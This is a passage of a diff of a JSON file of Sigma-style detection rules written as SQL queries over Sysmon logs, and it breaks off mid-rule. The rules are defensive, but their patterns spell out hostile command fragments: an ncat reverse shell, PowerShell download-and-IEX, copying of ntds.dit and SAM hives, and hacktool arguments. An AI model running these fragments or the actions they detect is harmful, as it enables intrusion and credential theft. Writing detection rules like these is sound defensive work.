monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass 
signing requirements for script execution from the CommandLine", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Run Once Task Execution as Configured in Registry", - "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "This rule detects the execution of Run Once task as configured in the registry", - "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], - "level": "low", + "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_runonce_execution.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel 
= 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "test", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "File Deletion Via Del", + "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "False positives levels will differ Depending on the environment. 
You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_cmd_del_execution.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - 
"car.2013-07-001", - "attack.s0404" + "attack.t1557.001" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE 
metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.g0049", "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", + "attack.t1059", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "status": 
"experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "status": "test", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "status": "test", - "description": "Use living 
off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "status": "experimental", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "falsepositives": [ + "Legitimate import of keys" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + }, + { + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" + "Scripts or tools that download files and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual 
parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i 
